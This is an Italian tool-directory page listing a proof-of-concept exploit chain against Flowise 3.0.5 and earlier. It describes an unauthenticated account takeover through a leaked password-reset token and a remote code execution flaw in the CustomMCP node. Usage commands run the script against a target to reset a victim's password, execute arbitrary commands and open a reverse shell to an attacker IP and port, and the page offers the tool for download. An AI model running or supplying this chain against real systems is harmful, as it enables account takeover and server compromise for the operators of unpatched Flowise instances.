Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-58434-59528 — CVE-2025-58434 e CVE-2025-59528 catena di POC | Kitploit
Strumenti/GitHubGitHub/azureadtrent/cve-2025-58434-59528
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneStrumento di Accesso Remoto
GitHubazureadtrent/cve-2025-58434-59528

CVE-2025-58434-59528

CVE-2025-58434 e CVE-2025-59528 catena di POC

Vedi Repository
435 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-58434 + CVE-2025-59528

Catena di exploit per due vulnerabilità che interessano Flowise <= 3.0.5.


Vulnerabilità

CVE-2025-58434 — Acquisizione Account Non Autenticata

L'endpoint di recupero password restituisce un token valido per il reset della password nella risposta API senza richiedere autenticazione. Un attaccante a conoscenza di un indirizzo email valido può reimpostare la password di qualsiasi account senza interazione da parte dell'utente.

CVE-2025-59528 — Esecuzione Remota di Codice Autenticata

Il nodo CustomMCP passa input controllato dall'utente direttamente a un costruttore Function() con pieni privilegi Node.js. Un utente autenticato con una chiave API valida può eseguire comandi arbitrari del sistema operativo come utente del processo Flowise.

Corretto in: Flowise 3.0.6


Requisiti

  • Python 3.8+
  • pip install requests

Utilizzo

Catena ATO completa (reimposta la password, richiede la chiave API, avvia una reverse shell):

root@kitploit:~
python3 flowise_chain.py -t http://target -e [email protected]

Solo RCE (se hai già una chiave API):

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"

Reverse shell con chiave esistente:

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444

Opzioni

FlagDescrizione
-t, --targetURL del target
-e, --emailEmail dell'account target (attiva la catena ATO)
--api-keyFornisci direttamente la chiave API (salta ATO)
-c, --commandComando da eseguire
--lhostIP dell'attaccante per reverse shell
--lportPorta dell'attaccante per reverse shell (default: 4444)
--new-passwordPassword da impostare durante il reset (default: Pwn3d!2026)
-k, --insecureSalta la verifica TLS

Note

A causa di una peculiarità in Flowise 3.0.5, l'endpoint API di reset password non aggiorna immediatamente la credenziale accettata dall'endpoint di login. Lo script si mette in pausa dopo il reset e ti chiede di accedere manualmente all'interfaccia utente e copiare la chiave API da /apikey.

Scarica lo strumento